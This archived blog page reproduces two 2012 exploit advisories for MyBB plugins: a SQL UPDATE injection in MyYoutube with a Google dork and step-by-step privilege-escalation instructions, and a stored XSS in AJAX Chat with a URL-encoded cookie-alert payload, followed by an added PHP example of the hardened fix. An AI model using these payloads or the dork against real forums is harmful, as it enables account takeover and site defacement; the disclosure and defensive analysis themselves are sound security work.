Archive for 19 December 2012

MyYoutube MyBB plugin SQL UPDATE injection

A SQL UPDATE injection vulnerability has been found in the MyYoutube MyBB plugin; how the vulnerability arises and the related source code are given below. The discoverer's description of the vulnerability is as follows:

# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.
# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"
# Date: 12.10.2012
# Exploit Author: Zixem
# Vendor Homepage: http://www.mybb-es.com
# Software Link: http://mods.mybb.com/view/myyoutube
# Version: 1.0
# Tested on: Linux.

MyYoutube plugin suffers from POST SQL UPDATE injection.

The vulnerability exists within youtube.php:

<?php

$plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/

function youtube_update($ytb) /*Line 128*/
{
    global $mybb;
    if(isset($mybb->input['ytb']))
    {
        // The raw POST value is copied straight into the data the user
        // datahandler turns into an UPDATE statement; it is neither
        // validated as a YouTube ID nor passed through escape_string().
        $ytb->user_update_data['ytb'] = $mybb->input['ytb'];
    }
}

?>

Instructions:

(1) Go to usercp.php?action=profile

(2) http://i.imgur.com/gPYdq.png

Enter this in the youtube ID field (just like in the picture): x', usergroup='4

(3) Press on the update button.

(4) You're an admin now :3

If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is 4.

PoC:

before: http://i.imgur.com/aPFsz.png

While exploiting: http://i.imgur.com/gPYdq.png

Result: http://i.imgur.com/4ezpF.png

http://twitter.com/z1xem

-Zixem

MyBB AJAX Chat Persistent XSS Vulnerability

A persistent XSS vulnerability has been found in MyBB AJAX Chat; the discoverer's explanation of how the vulnerability arises and is used is as follows.

# Title: MyBB AJAX Chat Persistent XSS Vulnerability

# Date: 12/12/2012

# Exploit Author: Mr. P-teo

# Vendor Homepage: http://www.mybb.com/

# Software Link: http://mods.mybb.com/view/ajax-chat

# Version: 1

# Tested on: Windows

The Persistent XSS vulnerability lies within the chat_frame.php page.

*************************************** Persistent / Stored XSS **************************************

Although the message is filtered with the htmlentities function below.

<?php
    // Insert path: the message is HTML-escaped before it is stored.
    $db->insert_query($tbl, array('uid' => $mybb->user['uid'], 'message' => $db->escape_string(htmlentities($message)), 'date' => time()));
?>

The vulnerability occurs with the use of the urldecode function, allowing us to bypass the htmlentities with url encoding.

<?php
    // Display path: the stored value is URL-decoded after the escaping step.
    $msg = urldecode($row["message"]);
?>

The vulnerability can be exploited via the following line, decoded as - "><img alt="" src="XSS" />

%22%3E%3Cimg%20src%3D%22XSS%22%20onerror%3D%22alert(document.cookie)%22%20%2F%3E%0A

This can be expanded on with defaces etc, alert is just a basic example.

Brought to you by Mr. P-teo.

Twitter: http://twitter.com/MrPteo
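The escape-then-decode ordering described in the advisory above, as an added example that is not part of the advisory or of the AJAX Chat plugin's code: the function names store_as_plugin, render_as_plugin and render_hardened are illustrative, and the hardened output path is an assumed fix, not the vendor's patch.

```php
<?php
// Added example, not the AJAX Chat plugin's code: shows why escaping with
// htmlentities() at insert time and urldecode()-ing at display time lets
// percent-encoded markup through, and the output-time escaping that fixes it.

// The chat message exactly as posted in the advisory above.
$posted = '%22%3E%3Cimg%20src%3D%22XSS%22%20onerror%3D%22alert(document.cookie)%22%20%2F%3E%0A';

// Mirrors the plugin's insert path: htmlentities() sees only %XX sequences,
// which contain nothing to escape, so the stored string is still fully encoded.
function store_as_plugin(string $message): string
{
    return htmlentities($message, ENT_QUOTES, 'UTF-8');
}

// Mirrors chat_frame.php: urldecode() on the stored value restores '<', '>'
// and '"', so the browser receives live markup.
function render_as_plugin(string $stored): string
{
    return urldecode($stored);
}

// Hardened output path (assumed fix, not the vendor's patch): escape at the
// very last step, after every decode, so whatever was stored is inert text.
function render_hardened(string $stored): string
{
    $decoded = urldecode($stored);
    return htmlspecialchars($decoded, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$stored     = store_as_plugin($posted);
$vulnerable = render_as_plugin($stored);
$safe       = render_hardened($stored);

// The property that matters: the plugin's path hands the tag back verbatim,
// while no '<' or raw '"' survives in the hardened output.
$plugin_emits_tag  = (strpos($vulnerable, '<img') !== false);
$hardened_is_inert = (strpos($safe, '<') === false && strpos($safe, '"') === false);

echo "plugin output:   " . $vulnerable . "\n";
echo "hardened output: " . $safe . "\n";
echo "plugin emits a live <img> tag: " . ($plugin_emits_tag ? 'yes' : 'no') . "\n";
echo "hardened output is inert:      " . ($hardened_is_inert ? 'yes' : 'no') . "\n";
```

The same check applies to any other decode step (base64, JSON, HTML entity decoding) placed after the escaping step: escaping is only effective when it is the last transformation before the data reaches the browser.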